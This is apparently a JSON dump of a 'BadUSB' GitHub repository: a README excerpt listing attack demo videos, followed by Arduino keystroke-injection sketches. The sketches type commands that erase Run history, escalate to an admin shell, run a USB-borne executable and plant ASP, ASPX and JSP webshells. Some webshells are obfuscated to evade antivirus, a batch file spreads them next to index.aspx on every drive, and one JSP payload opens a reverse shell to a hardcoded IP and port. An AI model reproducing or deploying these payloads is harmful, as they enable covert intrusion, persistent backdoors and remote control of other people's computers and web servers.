ForceConnectionToSpecifiedWiFi-DownloadPSL_TrojanRun.ino\n     │      \n     └─WiFi_PasswordAcquisition\n             WiFiPasswordCapture(tool).ino\n             WiFiPasswordExport(tool).ino\n        \n### Demo<br>\n[Video address](https://www.yuque.com/u12074055/gzgwfh/dg804t) <br>\nVideo: [Hardware Hacker] Control the upload through WiFi to execute, run, write HID scripts for BADUSB as well as a small extra 1<br>\nVideo: [Hardware Hacker] Control the upload via WiFi to execute, run, and write HID scripts for BADUSB as well as a small extra 2<br>\nVideo: [BADUSB Demo] U Drive Attack: Ignore any kill soft, hack your computer in 3 seconds!<br>\nVideo: [BADUSB Demo] Invading Square Large Screen, with Tutorial 1<br>\nVideo: [BADUSB Demo] 
Invading Square Large Screen, with Tutorial 2<br>\nVideo: [BADUSB demo] BADUSB implementation record keyboard<br>\nVideo: [BADUSB demo] Change the password of the account used + close the system process + blue screen test<br>\n![演示](https://upload-images.jianshu.io/upload_images/11477676-31390e8446540ca3.jpg?imageMogr2/auto-orient/strip|imageView2/2/w/554/format/webp)<br>\n\n### Advanced<br>\n[Video address](https://www.yuque.com/u12074055/cpuceb/dm1veu) <br>\nVideo: Badusb&MSF linkage<br>\nVideo: Start BadUSB with Nethunter<br>\n![进阶](https://upload-images.jianshu.io/upload_images/11477676-cc6c47da713ac2e2.jpg?imageMogr2/auto-orient/strip|imageView2/2/w/554/format/webp)<br>\n\n### Frequently asked questions and errors<br>\n[Video address](https://www.yuque.com/u12074055/cpuceb/uofha2) <br>\nVideo: BadUSB code writes exception handling<br>\n![常见问题和错误](https://upload-images.jianshu.io/upload_images/11477676-0c90a8004d5e5420.jpg?imageMogr2/auto-orient/strip|imageView2/2/w/554/format/webp)<br>\n\n### extension<br>\n[Video address](https://www.yuque.com/u12074055/cpuceb/hs3n7p) <br>\nVideo: [Hardware Hacker] Nine dollars to make a BadUSB<br>\nVideo: [Hardware Hacker] can directly replace Big Yellow Duck and Wifiducky's new BadUSB<br>\nVideo: BadUSB Tutorial Digispark + Chinese BadUSB<br>\n![扩展](https://upload-images.jianshu.io/upload_images/11477676-bba7de72abd2072d.jpg?imageMogr2/auto-orient/strip|imageView2/2/w/554/format/webp)<br>\n\n### Update<br>\n###### 2021.02.06 code update: part of it is open source code collected from other enthusiasts, and part of it is the workflow for linking with MSF and the Arduino Leonardo basic key code that I think is better to use<br>\n###### 2021.02.14 code update: inspired by other good projects, added CobaltStrike-linked trojans, DNS hijacking code, built-in Linux and OSX reverse shells, WiFi connection trojans, WiFi password acquisition, website one-sentence intrusion code, PSL full-screen hacked images, running programs on 
the U drive to expand the scope of intrusion, and code that implements many practical functions. Happy Valentine's Day!<br>\n![更新](https://upload-images.jianshu.io/upload_images/11477676-a54932b08d3ef2da.jpg?imageMogr2/auto-orient/strip|imageView2/2/w/554/format/webp)<br>\n\n### Link<br>\nThe code has been uploaded to GitHub and Gitee, **beg star**, other projects are also very fun, **continue to beg star**.<br>\n\n**GitHub：** https://github.com/wangwei39120157028/BadUSB<br>\n\n**Gitee：**  https://gitee.com/wwy2018/BadUSB<br>\n"
  },
  {
    "path": "RunProgramOn_UDrive_ExpandScopeOfIntrusion/UdiskRun/UdiskRun.ino",
    "content": "void setup() {//初始化\n  Keyboard.begin();//开始键盘通讯 \n  delay(5000);//延时\n  Keyboard.press(KEY_LEFT_GUI);//win键 \n  delay(500); \n  Keyboard.press('r');//r键 \n  delay(500); \n  Keyboard.release(KEY_LEFT_GUI);\n  Keyboard.release('r');\n  delay(500); \n  Keyboard.println(\"cmd /k reg delete HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Explorer\\\\RunMRU /f\");\n  delay(500);\n  Keyboard.println(\"for /f %a in (\\'wmic volume get driveletter^,label ^| Find \\\"LEMONC\\\"\\') do (set ab=%a)\");\n  delay(100);\n  Keyboard.println(\"copy /y %ab%\\\\x.exe %tmp%&%tmp%\\\\x.exe&exit\");\n  delay(1000);\n    Keyboard.press(KEY_LEFT_GUI);//win键 \n  delay(500); \n  Keyboard.press('r');//r键 \n  delay(500); \n  Keyboard.release(KEY_LEFT_GUI);\n  Keyboard.release('r');\n  Keyboard.println(\"powershell -c start-process -Filepath cmd \\' /k reg delete HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Explorer\\\\RunMRU /f\\'-verb runas\");\n  delay(3000);\n Keyboard.press(KEY_LEFT_ALT);\n Keyboard.print('y');\n Keyboard.release(KEY_LEFT_ALT);\n delay(1000);\n Keyboard.println(\"for /f %a in (\\'wmic volume get driveletter^,label ^| Find \\\"LEMONC\\\"\\') do (set ab=%a)\");\n delay(500);\n Keyboard.println(\"copy /y %ab%\\\\x.exe %tmp%&%tmp%\\\\x.exe&exit\");\n Keyboard.end();//结束键盘通讯 \n}\nvoid loop()//循环\n{\n}\n"
  },
  {
    "path": "RunProgramOn_UDrive_ExpandScopeOfIntrusion/UdiskRunv2/UdiskRunv2.ino",
    "content": "void setup() {//初始化\n  Keyboard.begin();//开始键盘通讯 \n  delay(5000);//延时\n  Keyboard.press(KEY_LEFT_GUI);//win键 \n  delay(500); \n  Keyboard.press('r');//r键 \n  delay(500); \n  Keyboard.release(KEY_LEFT_GUI);\n  Keyboard.release('r');\n  Keyboard.press(KEY_CAPS_LOCK);\n  Keyboard.release(KEY_CAPS_LOCK);\n  delay(500); \n  Keyboard.println(\"CMD /K REG DELETE hkcu\\\\sOFTWARE\\\\mICROSOFT\\\\wINDOWS\\\\cURRENTvERSION\\\\eXPLORER\\\\rUNmru /F\");\n  delay(500);\n  Keyboard.println(\"POWERSHELL -C START-PROCESS -fILEPATH CMD -VERB RUNAS&TASKKILL /F /IM CMD.EXE\");\n  delay(1000);\n  Keyboard.press(KEY_LEFT_ALT);\n  for(int i=0;i<100;i++){\n    delay(10);\n    Keyboard.print('y');\n  }\n   Keyboard.release(KEY_LEFT_ALT);\n delay(1000);\n  Keyboard.println(\"FOR /F %A IN (\\'WMIC VOLUME GET DRIVELETTER^,LABEL ^| fIND \\\"lemonc\\\"\\') DO (SET AB=%A)\");\n  delay(300);\n  Keyboard.println(\"%AB%\\\\X.EXE&&TASKKILL /F /IM CMD.EXE\");\n Keyboard.press(KEY_CAPS_LOCK);\n Keyboard.release(KEY_CAPS_LOCK);\n Keyboard.end();//结束键盘通讯 \n}\nvoid loop()//循环\n{\n  \n}\n"
  },
  {
    "path": "RunProgramOn_UDrive_ExpandScopeOfIntrusion/UdiskRunv3/UdiskRunv3.ino",
    "content": "void setup() {//初始化\n  Keyboard.begin();//开始键盘通讯 \n  delay(5000);//延时\n  Keyboard.press(KEY_LEFT_GUI);//win键 \n  delay(500); \n  Keyboard.press('r');//r键 \n  delay(500); \n  Keyboard.release(KEY_LEFT_GUI);\n  Keyboard.release('r');\n  Keyboard.press(KEY_CAPS_LOCK);\n  Keyboard.release(KEY_CAPS_LOCK);\n  delay(500); \n  Keyboard.println(\"CMD /c REG DELETE hkcu\\\\sOFTWARE\\\\mICROSOFT\\\\wINDOWS\\\\cURRENTvERSION\\\\eXPLORER\\\\rUNmru /F&POWERSHELL -C START-PROCESS -fILEPATH CMD -VERB RUNAS\");\n  delay(1500);\n  Keyboard.press(KEY_LEFT_ALT);\n  Keyboard.print('y');\n  Keyboard.release(KEY_LEFT_ALT);\n delay(1000);\n  Keyboard.println();\n  delay(300);\n  Keyboard.println(\"FOR /F %A IN (\\'WMIC VOLUME GET DRIVELETTER^,LABEL ^| fIND \\\"lemonc\\\"\\') DO (SET AB=%A)\");  //lemonc可替换\n  delay(300);\n  Keyboard.println(\"%AB%\\\\X.EXE&&TASKKILL /F /IM CMD.EXE\");\n Keyboard.press(KEY_CAPS_LOCK);\n Keyboard.release(KEY_CAPS_LOCK);\n Keyboard.end();//结束键盘通讯 \n}\nvoid loop()//循环\n{ \n}\n"
  },
  {
    "path": "Site_AWord_IntrusionCode/AspSentenceTrojanWrite(webServerVersion).ino",
    "content": "#include<Keyboard.h>\n\nvoid setup() {//初始化\n  Keyboard.begin();//开始键盘通讯 \n  delay(5000);//延时\n  Keyboard.press(KEY_CAPS_LOCK); //按下大写键 这里我们最好这样写 不然大多数电脑在中文输入的情况下就会出现问题\n  Keyboard.release(KEY_CAPS_LOCK); //释放大写键\n  delay(200);\n  Keyboard.press(KEY_LEFT_GUI);//win键 \n  delay(200); \n  Keyboard.press('r');//r键 \n  delay(200); \n  Keyboard.release(KEY_LEFT_GUI);\n  Keyboard.release('r');\n  Keyboard.println(\"cmd.exe\");\n  delay(200); \n  Keyboard.println('echo ^<%eval request(\"wwy\")%^> >> hacked.asp');  //向hacked.asp写内容,密码wwy\n  delay(200); \n  \n  Keyboard.println(\"echo @echo off >> hacked.bat\");\n  delay(200); \n  Keyboard.println(\"echo set 'FileName=index.aspx' >> hacked.bat\");  //目标文件index.aspx\n  delay(200); \n  Keyboard.println(\"echo echo 正在更新磁盘文件，请稍候... >> hacked.bat\");\n  delay(200); \n  Keyboard.println(\"echo for %%a in (C D E F G H I J K L M N O P Q R S T U V W X Y Z) do ( >> hacked.bat\");\n  delay(200); \n  Keyboard.println(\"echo   if exist %%a:\\ ( >> hacked.bat\");\n  delay(200); \n  Keyboard.println(\"echo     pushd %%a:\\ >> hacked.bat\");\n  delay(200); \n  Keyboard.println(\"echo     for /r %%b in (*%FileName%) do ( >> hacked.bat\");\n  delay(200); \n  Keyboard.println(\"echo       if /i '%%~nxb' equ '%FileName%' ( >> hacked.bat\");\n  delay(200); \n  Keyboard.println(\"echo         copy %~p0hacked.aspx %%~dpb >> hacked.bat\");\n  delay(200); \n  Keyboard.println(\"echo       ) >> hacked.bat\");\n  delay(200); \n  Keyboard.println(\"echo     ) >> hacked.bat\");\n  delay(200); \n  Keyboard.println(\"echo     popd >> hacked.bat\");\n  delay(200); \n  Keyboard.println(\"echo   ) >> hacked.bat\");\n  delay(200); \n  Keyboard.println(\"echo ) >> hacked.bat\");\n  delay(200); \n  \n  Keyboard.println(\"hacked.bat\");  //放入asp网站根目录，作为后门等待连接\n  delay(9000); \n  Keyboard.end();//结束键盘通讯 \n}\nvoid loop()//循环\n{\n}"
  },
  {
    "path": "Site_AWord_IntrusionCode/AspSentenceTrojanWriting(websiteServerVersion-DynamicDecoding).ino",
    "content": "#include<Keyboard.h>\n\nvoid setup() {//初始化\n  Keyboard.begin();//开始键盘通讯 \n  delay(5000);//延时\n  Keyboard.press(KEY_CAPS_LOCK); //按下大写键 这里我们最好这样写 不然大多数电脑在中文输入的情况下就会出现问题\n  Keyboard.release(KEY_CAPS_LOCK); //释放大写键\n  delay(200);\n  Keyboard.press(KEY_LEFT_GUI);//win键 \n  delay(200); \n  Keyboard.press('r');//r键 \n  delay(200); \n  Keyboard.release(KEY_LEFT_GUI);\n  Keyboard.release('r');\n  Keyboard.println(\"cmd.exe\");\n  delay(200); \n  Keyboard.println(\"echo ^<% >> hacked.asp\");  //向hacked.asp写内容,密码z\n  delay(200); \n  Keyboard.println(\"echo Function MorfiCoder(Code) >> hacked.asp\");\n  delay(200); \n  Keyboard.println(\"echo MorfiCoder=Replace(Replace(StrReverse(Code),'/*/',''''),'\\*\\',vbCrlf) >> hacked.asp\");\n  delay(200); \n  Keyboard.println(\"echo End Function >> hacked.asp\");\n  delay(200); \n  Keyboard.println('echo Execute MorfiCoder(\")/*/z/*/(tseuqer lave\") >> hacked.asp');\n  delay(200); \n  Keyboard.println(\"echo %^> >> hacked.asp\");\n  delay(200); \n\n  Keyboard.println(\"echo @echo off >> hacked.bat\");\n  delay(200); \n  Keyboard.println(\"echo set 'FileName=index.aspx' >> hacked.bat\");  //目标文件index.aspx\n  delay(200); \n  Keyboard.println(\"echo echo 正在更新磁盘文件，请稍候... 
>> hacked.bat\");\n  delay(200); \n  Keyboard.println(\"echo for %%a in (C D E F G H I J K L M N O P Q R S T U V W X Y Z) do ( >> hacked.bat\");\n  delay(200); \n  Keyboard.println(\"echo   if exist %%a:\\ ( >> hacked.bat\");\n  delay(200); \n  Keyboard.println(\"echo     pushd %%a:\\ >> hacked.bat\");\n  delay(200); \n  Keyboard.println(\"echo     for /r %%b in (*%FileName%) do ( >> hacked.bat\");\n  delay(200); \n  Keyboard.println(\"echo       if /i '%%~nxb' equ '%FileName%' ( >> hacked.bat\");\n  delay(200); \n  Keyboard.println(\"echo         copy %~p0hacked.aspx %%~dpb >> hacked.bat\");\n  delay(200); \n  Keyboard.println(\"echo       ) >> hacked.bat\");\n  delay(200); \n  Keyboard.println(\"echo     ) >> hacked.bat\");\n  delay(200); \n  Keyboard.println(\"echo     popd >> hacked.bat\");\n  delay(200); \n  Keyboard.println(\"echo   ) >> hacked.bat\");\n  delay(200); \n  Keyboard.println(\"echo ) >> hacked.bat\");\n  delay(200); \n  \n  Keyboard.println(\"hacked.bat\");  //放入asp网站根目录，作为后门等待连接\n  delay(9000); \n  Keyboard.end();//结束键盘通讯 \n}\nvoid loop()//循环\n{\n}"
  },
  {
    "path": "Site_AWord_IntrusionCode/AspSentenceTrojanWriting(websiteServerVersion-ScriptEncoderEncryption).ino",
    "content": "#include<Keyboard.h>\n\nvoid setup() {//初始化\n  Keyboard.begin();//开始键盘通讯 \n  delay(5000);//延时\n  Keyboard.press(KEY_CAPS_LOCK); //按下大写键 这里我们最好这样写 不然大多数电脑在中文输入的情况下就会出现问题\n  Keyboard.release(KEY_CAPS_LOCK); //释放大写键\n  delay(200);\n  Keyboard.press(KEY_LEFT_GUI);//win键 \n  delay(200); \n  Keyboard.press('r');//r键 \n  delay(200); \n  Keyboard.release(KEY_LEFT_GUI);\n  Keyboard.release('r');\n  Keyboard.println(\"cmd.exe\");\n  delay(200); \n  Keyboard.println(\"echo ^<%@ LANGUAGE = VBScript.Encode %^> >> hacked.asp\");  //向hacked.asp写内容,密码wwy\n  delay(200); \n  Keyboard.println('echo ^<%#@~^PgAAAA==~b0~\"+$E+kYvEmr#@!@*rJ~O4+x,36mEDn!VK4mV~Dn5!+dYvEmr#~n NPrW,SBMAAA==^#~@%^> >> hacked.asp');  //向hacked.asp写内容,密码c\n  delay(200); \n\n  Keyboard.println(\"echo @echo off >> hacked.bat\");\n  delay(200); \n  Keyboard.println(\"echo set 'FileName=index.aspx' >> hacked.bat\");  //目标文件index.aspx\n  delay(200); \n  Keyboard.println(\"echo echo 正在更新磁盘文件，请稍候... >> hacked.bat\");\n  delay(200); \n  Keyboard.println(\"echo for %%a in (C D E F G H I J K L M N O P Q R S T U V W X Y Z) do ( >> hacked.bat\");\n  delay(200); \n  Keyboard.println(\"echo   if exist %%a:\\ ( >> hacked.bat\");\n  delay(200); \n  Keyboard.println(\"echo     pushd %%a:\\ >> hacked.bat\");\n  delay(200); \n  Keyboard.println(\"echo     for /r %%b in (*%FileName%) do ( >> hacked.bat\");\n  delay(200); \n  Keyboard.println(\"echo       if /i '%%~nxb' equ '%FileName%' ( >> hacked.bat\");\n  delay(200); \n  Keyboard.println(\"echo         copy %~p0hacked.aspx %%~dpb >> hacked.bat\");\n  delay(200); \n  Keyboard.println(\"echo       ) >> hacked.bat\");\n  delay(200); \n  Keyboard.println(\"echo     ) >> hacked.bat\");\n  delay(200); \n  Keyboard.println(\"echo     popd >> hacked.bat\");\n  delay(200); \n  Keyboard.println(\"echo   ) >> hacked.bat\");\n  delay(200); \n  Keyboard.println(\"echo ) >> hacked.bat\");\n  delay(200); \n  \n  Keyboard.println(\"hacked.bat\");  //放入asp网站根目录，作为后门等待连接\n  
delay(9000); \n  Keyboard.end();//结束键盘通讯 \n}\nvoid loop()//循环\n{\n}"
  },
  {
    "path": "Site_AWord_IntrusionCode/AspxSentenceTrojanWrite(webServerVersion OverDog_OverDShield).ino",
    "content": "#include<Keyboard.h>\n\nvoid setup() {//初始化\n  Keyboard.begin();//开始键盘通讯 \n  delay(5000);//延时\n  Keyboard.press(KEY_CAPS_LOCK); //按下大写键 这里我们最好这样写 不然大多数电脑在中文输入的情况下就会出现问题\n  Keyboard.release(KEY_CAPS_LOCK); //释放大写键\n  delay(200);\n  Keyboard.press(KEY_LEFT_GUI);//win键 \n  delay(200); \n  Keyboard.press('r');//r键 \n  delay(200); \n  Keyboard.release(KEY_LEFT_GUI);\n  Keyboard.release('r');\n  Keyboard.println(\"cmd.exe\");\n  delay(200); \n  Keyboard.println(\"echo ^<%@ Page Language = Jscript %^> >> hacked.aspx\");  //向hacked.aspx写内容,密码-7\n  delay(200);\n  Keyboard.println(\"echo ^<%var/*-/*-*/P/*-/*-*/=/*-/*-*/'e'+'v'+/*-/*-*/ >> hacked.aspx\");\n  delay(200);\n  Keyboard.println(\"echo 'a'+'l'+'('+'R'+'e'+/*-/*-*/'q'+'u'+'e'/*-/*-*/+'s'+'t'+ >> hacked.aspx\");\n  delay(200);\n  Keyboard.println(\"echo '[/*-/*-*/0/*-/*-*/-/*-/*-*/2/*-/*-*/-/*-/*-*/5/*-/*-*/]'+ >> hacked.aspx\");\n  delay(200);\n  Keyboard.println(\"echo ','+'\\''+'u'+'n'+'s'/*-/*-*/+'a'+'f'+'e'+'\\''+')';eval >> hacked.aspx\");\n  delay(200);\n  Keyboard.println(\"echo (/*-/*-*/P/*-/*-*/,/*-/*-*/'u'+'n'+'s'/*-/*-*/+'a'+'f'+'e'/*-/*-*/);%^> >> hacked.aspx\");\n  delay(200);\n  \n  Keyboard.println(\"echo @echo off >> hacked.bat\");\n  delay(200); \n  Keyboard.println(\"echo set 'FileName=index.aspx' >> hacked.bat\");  //目标文件index.aspx\n  delay(200); \n  Keyboard.println(\"echo echo 正在更新磁盘文件，请稍候... 
>> hacked.bat\");\n  delay(200); \n  Keyboard.println(\"echo for %%a in (C D E F G H I J K L M N O P Q R S T U V W X Y Z) do ( >> hacked.bat\");\n  delay(200); \n  Keyboard.println(\"echo   if exist %%a:\\ ( >> hacked.bat\");\n  delay(200); \n  Keyboard.println(\"echo     pushd %%a:\\ >> hacked.bat\");\n  delay(200); \n  Keyboard.println(\"echo     for /r %%b in (*%FileName%) do ( >> hacked.bat\");\n  delay(200); \n  Keyboard.println(\"echo       if /i '%%~nxb' equ '%FileName%' ( >> hacked.bat\");\n  delay(200); \n  Keyboard.println(\"echo         copy %~p0hacked.aspx %%~dpb >> hacked.bat\");\n  delay(200); \n  Keyboard.println(\"echo       ) >> hacked.bat\");\n  delay(200); \n  Keyboard.println(\"echo     ) >> hacked.bat\");\n  delay(200); \n  Keyboard.println(\"echo     popd >> hacked.bat\");\n  delay(200); \n  Keyboard.println(\"echo   ) >> hacked.bat\");\n  delay(200); \n  Keyboard.println(\"echo ) >> hacked.bat\");\n  delay(200); \n  \n  Keyboard.println(\"hacked.bat\");  //放入asp网站根目录，作为后门等待连接\n  delay(9000); \n  Keyboard.end();//结束键盘通讯 \n}\nvoid loop()//循环\n{\n}"
  },
  {
    "path": "Site_AWord_IntrusionCode/AspxSentenceTrojanWrite(webServerVersion).ino",
    "content": "#include<Keyboard.h>\n\nvoid setup() {//初始化\n  Keyboard.begin();//开始键盘通讯 \n  delay(5000);//延时\n  Keyboard.press(KEY_CAPS_LOCK); //按下大写键 这里我们最好这样写 不然大多数电脑在中文输入的情况下就会出现问题\n  Keyboard.release(KEY_CAPS_LOCK); //释放大写键\n  delay(200);\n  Keyboard.press(KEY_LEFT_GUI);//win键 \n  delay(200); \n  Keyboard.press('r');//r键 \n  delay(200); \n  Keyboard.release(KEY_LEFT_GUI);\n  Keyboard.release('r');\n  Keyboard.println(\"cmd.exe\");\n  delay(200); \n  Keyboard.println('echo ^<%@ Page Language=\"Jscript\"%^>^<%eval(Request.Item[\"wwy\"],\"unsafe\");%^> >> hacked.asp');  //向hacked.asp写内容,密码wwy\n  delay(200); \n  \n  Keyboard.println(\"echo @echo off >> hacked.bat\");\n  delay(200); \n  Keyboard.println(\"echo set 'FileName=index.aspx' >> hacked.bat\");  //目标文件index.aspx\n  delay(200); \n  Keyboard.println(\"echo echo 正在更新磁盘文件，请稍候... >> hacked.bat\");\n  delay(200); \n  Keyboard.println(\"echo for %%a in (C D E F G H I J K L M N O P Q R S T U V W X Y Z) do ( >> hacked.bat\");\n  delay(200); \n  Keyboard.println(\"echo   if exist %%a:\\ ( >> hacked.bat\");\n  delay(200); \n  Keyboard.println(\"echo     pushd %%a:\\ >> hacked.bat\");\n  delay(200); \n  Keyboard.println(\"echo     for /r %%b in (*%FileName%) do ( >> hacked.bat\");\n  delay(200); \n  Keyboard.println(\"echo       if /i '%%~nxb' equ '%FileName%' ( >> hacked.bat\");\n  delay(200); \n  Keyboard.println(\"echo         copy %~p0hacked.aspx %%~dpb >> hacked.bat\");\n  delay(200); \n  Keyboard.println(\"echo       ) >> hacked.bat\");\n  delay(200); \n  Keyboard.println(\"echo     ) >> hacked.bat\");\n  delay(200); \n  Keyboard.println(\"echo     popd >> hacked.bat\");\n  delay(200); \n  Keyboard.println(\"echo   ) >> hacked.bat\");\n  delay(200); \n  Keyboard.println(\"echo ) >> hacked.bat\");\n  delay(200); \n  \n  Keyboard.println(\"hacked.bat\");  //放入asp网站根目录，作为后门等待连接\n  delay(9000); \n  Keyboard.end();//结束键盘通讯 \n}\nvoid loop()//循环\n{\n}"
  },
  {
    "path": "Site_AWord_IntrusionCode/JspSentenceTrojanWritten (JSP_websiteServerUse).ino",
    "content": "#include<Keyboard.h>\n\nvoid setup() {//初始化\n  Keyboard.begin();//开始键盘通讯 \n  delay(5000);//延时\n  Keyboard.press(KEY_CAPS_LOCK); //按下大写键 这里我们最好这样写 不然大多数电脑在中文输入的情况下就会出现问题\n  Keyboard.release(KEY_CAPS_LOCK); //释放大写键\n  delay(200);\n  Keyboard.press(KEY_LEFT_GUI);//win键 \n  delay(200); \n  Keyboard.press('r');//r键 \n  delay(200); \n  Keyboard.release(KEY_LEFT_GUI);\n  Keyboard.release('r');\n  Keyboard.println(\"cmd.exe\");\n  delay(200); \n  Keyboard.println('echo ^<%@page import=\"java.lang.*\"%^>  >> hacked.jsp');  //向hacked.jsp写内容，这是一种jsp常见的一句话跳板木马，http://localhost/1.jsp?f=1.txt&t=hacker ，然后:http://localhost/1.txt 就出来了 内容为hacker，便于挂jsp大马\n  delay(200); \n  Keyboard.println(\"echo ^<%  >> hacked.jsp\");\n  Keyboard.println('echo if(request.getParameter(\"f\")!=null)(new java.io.FileOutputStream(application.getRealPath(\"\\\")+request.getParameter(\"f\"))).write(request.getParameter(\"t\").getBytes());  >> hacked.jsp');\n  Keyboard.println(\"echo %^> >> hacked.jsp\");\n\n  Keyboard.println(\"echo @echo off >> hacked.bat\");\n  delay(200); \n  Keyboard.println(\"echo set 'FileName=index.aspx' >> hacked.bat\");  //目标文件index.aspx\n  delay(200); \n  Keyboard.println(\"echo echo 正在更新磁盘文件，请稍候... 
>> hacked.bat\");\n  delay(200); \n  Keyboard.println(\"echo for %%a in (C D E F G H I J K L M N O P Q R S T U V W X Y Z) do ( >> hacked.bat\");\n  delay(200); \n  Keyboard.println(\"echo   if exist %%a:\\ ( >> hacked.bat\");\n  delay(200); \n  Keyboard.println(\"echo     pushd %%a:\\ >> hacked.bat\");\n  delay(200); \n  Keyboard.println(\"echo     for /r %%b in (*%FileName%) do ( >> hacked.bat\");\n  delay(200); \n  Keyboard.println(\"echo       if /i '%%~nxb' equ '%FileName%' ( >> hacked.bat\");\n  delay(200); \n  Keyboard.println(\"echo         copy %~p0hacked.aspx %%~dpb >> hacked.bat\");\n  delay(200); \n  Keyboard.println(\"echo       ) >> hacked.bat\");\n  delay(200); \n  Keyboard.println(\"echo     ) >> hacked.bat\");\n  delay(200); \n  Keyboard.println(\"echo     popd >> hacked.bat\");\n  delay(200); \n  Keyboard.println(\"echo   ) >> hacked.bat\");\n  delay(200); \n  Keyboard.println(\"echo ) >> hacked.bat\");\n  delay(200); \n  \n  Keyboard.println(\"hacked.bat\");  //放入jsp网站根目录，作为后门等待连接\n  delay(9000); \n  Keyboard.end();//结束键盘通讯 \n}\nvoid loop()//循环\n{\n}"
  },
  {
    "path": "Site_AWord_IntrusionCode/JspTrojanWrite(JSP_websiteServerUsing-non-Sentence).ino",
    "content": "#include<Keyboard.h>\n\nvoid setup() {//初始化\n  Keyboard.begin();//开始键盘通讯 \n  delay(5000);//延时\n  Keyboard.press(KEY_CAPS_LOCK); //按下大写键 这里我们最好这样写 不然大多数电脑在中文输入的情况下就会出现问题\n  Keyboard.release(KEY_CAPS_LOCK); //释放大写键\n  delay(200);\n  Keyboard.press(KEY_LEFT_GUI);//win键 \n  delay(200); \n  Keyboard.press('r');//r键 \n  delay(200); \n  Keyboard.release(KEY_LEFT_GUI);\n  Keyboard.release('r');\n  Keyboard.println(\"cmd.exe\");\n  delay(200); \n  Keyboard.println('echo ^<%@page import=\"java.lang.*\"%^>  >> hacked.jsp');  //向hacked.jsp写内容\n  delay(200); \n  Keyboard.println('echo ^<%@page import=\"java.util.*\"%^>  >> hacked.jsp');\n  delay(200); \n  Keyboard.println('echo ^<%@page import=\"java.io.*\"%^>  >> hacked.jsp');\n  delay(200); \n  Keyboard.println('echo ^<%@page import=\"java.net.*\"%^>  >> hacked.jsp');\n  delay(200); \n  Keyboard.println(\"echo ^<%  >> hacked.jsp\");\n  delay(200); \n  Keyboard.println(\"echo   class StreamConnector extends Thread  >> hacked.jsp\");\n  delay(200); \n  Keyboard.println(\"echo   {  >> hacked.jsp\");\n  delay(200); \n  Keyboard.println(\"echo     InputStream ep;  >> hacked.jsp\");\n  delay(200); \n  Keyboard.println(\"echo     OutputStream wk;  >> hacked.jsp\");\n  delay(200); \n  Keyboard.println(\"echo     StreamConnector( InputStream ep, OutputStream wk )  >> hacked.jsp\");\n  delay(200); \n  Keyboard.println(\"echo     {  >> hacked.jsp\");\n  delay(200); \n  Keyboard.println(\"echo       this.ep = ep;  >> hacked.jsp\");\n  delay(200); \n  Keyboard.println(\"echo       this.wk = wk;  >> hacked.jsp\");\n  delay(200); \n  Keyboard.println(\"echo     }  >> hacked.jsp\");\n  delay(200); \n  Keyboard.println(\"echo     public void run()  >> hacked.jsp\");\n  delay(200); \n  Keyboard.println(\"echo     {  >> hacked.jsp\");\n  delay(200); \n  Keyboard.println(\"echo       BufferedReader lv  = null;  >> hacked.jsp\");\n  delay(200); \n  Keyboard.println(\"echo       BufferedWriter gih = null;  >> hacked.jsp\");\n  
delay(200); \n  Keyboard.println(\"echo       try  >> hacked.jsp\");\n  delay(200); \n  Keyboard.println(\"echo       {  >> hacked.jsp\");\n  delay(200); \n  Keyboard.println(\"echo         lv  = new BufferedReader( new InputStreamReader( this.ep ) );  >> hacked.jsp\");\n  delay(200); \n  Keyboard.println(\"echo         gih = new BufferedWriter( new OutputStreamWriter( this.wk ) );  >> hacked.jsp\");\n  delay(200); \n  Keyboard.println(\"echo         char buffer[] = new char[8192];  >> hacked.jsp\");\n  delay(200); \n  Keyboard.println(\"echo         int length;  >> hacked.jsp\");\n  delay(200); \n  Keyboard.println(\"echo         while( ( length = lv.read( buffer, 0, buffer.length ) ) > 0 )  >> hacked.jsp\");\n  delay(200); \n  Keyboard.println(\"echo         {  >> hacked.jsp\");\n  delay(200); \n  Keyboard.println(\"echo           gih.write( buffer, 0, length );  >> hacked.jsp\");\n  delay(200); \n  Keyboard.println(\"echo           gih.flush();  >> hacked.jsp\");\n  delay(200); \n  Keyboard.println(\"echo         }  >> hacked.jsp\");\n  delay(200); \n  Keyboard.println(\"echo       } catch( Exception e ){}  >> hacked.jsp\");\n  delay(200); \n  Keyboard.println(\"echo       try  >> hacked.jsp\");\n  delay(200); \n  Keyboard.println(\"echo       {  >> hacked.jsp\");\n  delay(200); \n  Keyboard.println(\"echo         if( lv != null )  >> hacked.jsp\");\n  delay(200); \n  Keyboard.println(\"echo           lv.close();  >> hacked.jsp\");\n  delay(200); \n  Keyboard.println(\"echo         if( gih != null )  >> hacked.jsp\");\n  delay(200); \n  Keyboard.println(\"echo           gih.close();  >> hacked.jsp\");\n  delay(200); \n  Keyboard.println(\"echo       } catch( Exception e ){}  >> hacked.jsp\");\n  delay(200); \n  Keyboard.println(\"echo     }  >> hacked.jsp\");\n  delay(200); \n  Keyboard.println(\"echo   }  >> hacked.jsp\");\n  delay(200); \n  Keyboard.println(\"echo   try  >> hacked.jsp\");\n  delay(200); \n  Keyboard.println(\"echo   {  >> hacked.jsp\");\n  
delay(200); \n  Keyboard.println(\"echo     String ShellPath;  >> hacked.jsp\");\n  delay(200); \n  Keyboard.println('echo if (System.getProperty(\"os.name\").toLowerCase().indexOf(\"windows\") == -1) {  >> hacked.jsp');\n  delay(200); \n  Keyboard.println('echo   ShellPath = new String(\"/bin/sh\");  >> hacked.jsp');\n  delay(200); \n  Keyboard.println(\"echo } else {  >> hacked.jsp\");\n  delay(200); \n  Keyboard.println('echo   ShellPath = new String(\"cmd.exe\");  >> hacked.jsp');\n  delay(200); \n  Keyboard.println(\"echo }  >> hacked.jsp\");\n  delay(200); \n  Keyboard.println('echo     Socket socket = new Socket( \"192.168.154.131\", 4444 );  >> hacked.jsp');  //改为自己主机的IP地址和对应端口号\n  delay(200); \n  Keyboard.println(\"echo     Process process = Runtime.getRuntime().exec( ShellPath );  >> hacked.jsp\");\n  delay(200); \n  Keyboard.println(\"echo     ( new StreamConnector( process.getInputStream(), socket.getOutputStream() ) ).start();  >> hacked.jsp\");\n  delay(200); \n  Keyboard.println(\"echo     ( new StreamConnector( socket.getInputStream(), process.getOutputStream() ) ).start();  >> hacked.jsp\");\n  delay(200); \n  Keyboard.println(\"echo   } catch( Exception e ) {}  >> hacked.jsp\");\n  delay(200); \n  Keyboard.println(\"echo %^>  >> hacked.jsp\");\n  delay(200); \n  \n  Keyboard.println(\"echo @echo off >> hacked.bat\");\n  delay(200); \n  Keyboard.println(\"echo set 